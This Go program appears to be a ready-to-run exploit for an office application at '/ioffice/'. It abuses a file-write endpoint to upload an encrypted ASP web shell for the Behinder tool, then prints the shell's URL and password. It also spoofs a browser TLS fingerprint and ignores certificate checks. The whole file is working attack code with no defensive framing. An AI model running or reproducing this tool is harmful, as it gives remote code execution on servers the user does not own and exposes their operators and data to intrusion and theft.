package main

import (
	"crypto/tls"
	"fmt"
	"github.com/hpifu/go-kit/hflag"
	"github.com/imroc/req/v3"
	"github.com/liushuochen/gotable"
	"github.com/thanhpk/randstr"
	"log"
	"net/http"
	"os"
	"strings"
	"time"
)

func main() {
	now := time.Now()
	param := getParam()
	uploader(param)
	fmt.Printf("[√] 速度还是挺快的就这么点时间%s就GetShell了.", time.Since(now).String())
}

func getParam() string {
	hflag.AddFlag("target", "海翔地址", hflag.Required(), hflag.Shorthand("t"))
	if err := hflag.Parse(); err != nil {
		fmt.Println(hflag.Usage())
		os.Exit(0)
	}
	return hflag.GetString("target")
}

func reqClient() *req.Client {
	cli := req.C()
	cli.SetAutoDecodeAllContentType()
	cli.SetRedirectPolicy(req.NoRedirectPolicy())
	cli.SetTimeout(time.Second * 15)
	cli.SetTLSFingerprintSafari()
	cli.TLSClientConfig = &tls.Config{InsecureSkipVerify: true,
		MinVersion: tls.VersionTLS10,
		MaxVersion: tls.VersionTLS13}
	return cli
}

func uploader(target string) {
	shellName := randstr.Hex(8) + ".asp"
	shellString := "<%\nResponse.CharSet = \"UTF-8\" \nk=\"e45e329feb5d925b\" \nSession(\"k\")=k\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFor i=1 To size\nresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))\nNext\nexecute(result)\n%>\n"
	vulUrl := strings.Replace(target+"/ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename="+shellName+"&filepath=/upfiles/rep/pic/", "//io", "/io", 1)
	client := reqClient()
	post, err := client.R().SetBody(shellString).Post(vulUrl)
	if err != nil {
		log.Println(err)
		return
	}
	defer func() {
		_ = post.Body.Close()
	}()
	if post.StatusCode != http.StatusOK {
		fmt.Println("GetShell Failed")
		return
	}
	shellURL := strings.Replace(target+"/ioffice/upfiles/rep/pic/"+shellName, "//io", "/io", 1)
	get, _ := client.R().Get(shellURL)
	if get.StatusCode != http.StatusNotFound {
		create, _ := gotable.Create("Shell连接工具", "Shell连接地址", "Shell连接密码")
		_ = create.AddRow([]string{
			"冰蝎", shellURL, "rebeyond",
		})
		fmt.Println(create)
	}
	defer func() {
		_ = get.Body.Close()
	}()
}
